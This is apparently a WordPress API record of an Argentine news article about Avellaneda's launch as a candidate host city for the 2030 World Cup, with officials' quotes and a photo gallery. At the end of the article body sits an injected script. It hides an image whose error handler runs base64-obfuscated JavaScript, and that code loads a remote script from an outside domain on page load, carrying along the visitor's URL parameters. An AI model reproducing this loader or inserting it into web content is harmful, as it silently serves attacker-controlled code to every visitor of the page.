{"id":14482,"date":"2023-09-24T23:11:52","date_gmt":"2023-09-25T02:11:52","guid":{"rendered":"https:\/\/nubesmgzdigital.com.ar\/?p=14482"},"modified":"2025-08-13T16:08:53","modified_gmt":"2025-08-13T19:08:53","slug":"mundial-2030-lanzamiento-de-la-postulacion-de-avellaneda-como-sede","status":"publish","type":"post","link":"https:\/\/nubesmgzdigital.com.ar\/index.php\/2023\/09\/24\/mundial-2030-lanzamiento-de-la-postulacion-de-avellaneda-como-sede\/","title":{"rendered":"Mundial 2030: lanzamiento de la postulaci\u00f3n de Avellaneda como sede"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-vivid-cyan-blue-color has-text-color\"><em>Con la presencia de los ministros Sergio Massa y Mat\u00edas Lammens y el intendente Jorge Ferraresi<\/em><\/h3>\n\n\n\n<p>El ministro de Econom\u00eda de la Naci\u00f3n, Sergio Massa, y su par de Turismo y Deportes, Mat\u00edas Lammens, encabezaron el lanzamiento de Avellaneda Ciudad Sede, en el marco del consorcio \u201cJuntos 2030\u201d que postula a Argentina, Paraguay, Uruguay y Chile como sede conjunta de la Copa Mundial de la FIFA 2030. El anfitri\u00f3n del evento fue el intendente Jorge Ferraresi.<\/p>\n\n\n\n<p>Tambi\u00e9n participaron la jefa de gabinete de Avellaneda, Magdalena Sierra; el presidente de Racing Club, V\u00edctor Blanco; y el secretario general del Club Atl\u00e9tico Independiente, Daniel Seoane.<\/p>\n\n\n\n<p>En este contexto, Massa manifest\u00f3: \u201cPara la Argentina, esta es una enorme oportunidad de mostrar el talento de nuestra gente, nuestra belleza natural, nuestra infraestructura y nuestra capacidad de recibir turistas, como cuando hace poquito organizamos el Mundial Sub-20. Y ahora, junto con Chile, Uruguay y Paraguay, tenemos el desaf\u00edo de recibir el Mundial 2030. Avellaneda, la capital del f\u00fatbol, cumple con todo lo que tiene que tener y cuenta con mi compromiso de hacer las obras que tengamos que hacer\u201d.<\/p>\n\n\n\n<p>Asimismo, Lammens destac\u00f3: \u201cCuando uno trae un evento tan importante, no solamente es un orgullo sino que tambi\u00e9n genera un impacto econ\u00f3mico importante. Por eso, esta candidatura para nosotros es un gran desaf\u00edo. Y una ciudad como Avellaneda no pod\u00eda estar ausente. Tenemos los mejores estadios y somos los campeones del mundo: no tengo ninguna duda de que el Mundial se va a jugar en Avellaneda y en la Argentina\u201d.<\/p>\n\n\n\n<p>A su turno, Ferraresi expres\u00f3: \u201cVenimos trabajando desde 2016 para traer a Avellaneda un evento de esta magnitud. Somos una de las 14 ciudades del pa\u00eds que nos presentamos como sede y tenemos muy buenas chances\u201d.<\/p>\n\n\n\n<p>El lanzamiento de Avellaneda Ciudad Sede, que se llev\u00f3 adelante en el Polideportivo Jos\u00e9 Mar\u00eda Gatica, pone en valor el patrimonio deportivo, la infraestructura existente y por construir y la comuni\u00f3n entre los clubes del municipio de Avellaneda, que albergan el sue\u00f1o de recibir al evento m\u00e1s importante del f\u00fatbol mundial.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"14485\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380238074_625098689797139_8506233836968230101_n-1024x682.jpg\" alt=\"\" class=\"wp-image-14485\" srcset=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380238074_625098689797139_8506233836968230101_n-1024x682.jpg 1024w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380238074_625098689797139_8506233836968230101_n-300x200.jpg 300w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380238074_625098689797139_8506233836968230101_n-768x511.jpg 768w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380238074_625098689797139_8506233836968230101_n-696x464.jpg 696w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380238074_625098689797139_8506233836968230101_n-1068x711.jpg 1068w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380238074_625098689797139_8506233836968230101_n-631x420.jpg 631w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380238074_625098689797139_8506233836968230101_n.jpg 1440w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"14484\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380276952_625098666463808_1283071718933033906_n-1024x682.jpg\" alt=\"\" class=\"wp-image-14484\" srcset=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380276952_625098666463808_1283071718933033906_n-1024x682.jpg 1024w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380276952_625098666463808_1283071718933033906_n-300x200.jpg 300w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380276952_625098666463808_1283071718933033906_n-768x511.jpg 768w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380276952_625098666463808_1283071718933033906_n-696x464.jpg 696w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380276952_625098666463808_1283071718933033906_n-1068x711.jpg 1068w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380276952_625098666463808_1283071718933033906_n-631x420.jpg 631w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380276952_625098666463808_1283071718933033906_n.jpg 1440w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" data-id=\"14483\" src=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380345179_625098589797149_29873787601045633_n-1024x682.jpg\" alt=\"\" class=\"wp-image-14483\" srcset=\"https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380345179_625098589797149_29873787601045633_n-1024x682.jpg 1024w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380345179_625098589797149_29873787601045633_n-300x200.jpg 300w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380345179_625098589797149_29873787601045633_n-768x511.jpg 768w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380345179_625098589797149_29873787601045633_n-696x464.jpg 696w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380345179_625098589797149_29873787601045633_n-1068x711.jpg 1068w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380345179_625098589797149_29873787601045633_n-631x420.jpg 631w, https:\/\/nubesmgzdigital.com.ar\/wp-content\/uploads\/2023\/09\/380345179_625098589797149_29873787601045633_n.jpg 1440w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con la presencia de los ministros Sergio Massa y Mat\u00edas Lammens y el intendente Jorge Ferraresi El ministro de Econom\u00eda de la Naci\u00f3n, Sergio Massa, y su par de Turismo y Deportes, Mat\u00edas Lammens, encabezaron el lanzamiento de Avellaneda Ciudad Sede, en el marco del consorcio \u201cJuntos 2030\u201d que postula a Argentina, Paraguay, Uruguay y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":14483,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[111],"tags":[],"class_list":["post-14482","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-nacional"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts\/14482","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/comments?post=14482"}],"version-history":[{"count":2,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts\/14482\/revisions"}],"predecessor-version":[{"id":19391,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/posts\/14482\/revisions\/19391"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/media\/14483"}],"wp:attachment":[{"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/media?parent=14482"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/categories?post=14482"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nubesmgzdigital.com.ar\/index.php\/wp-json\/wp\/v2\/tags?post=14482"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}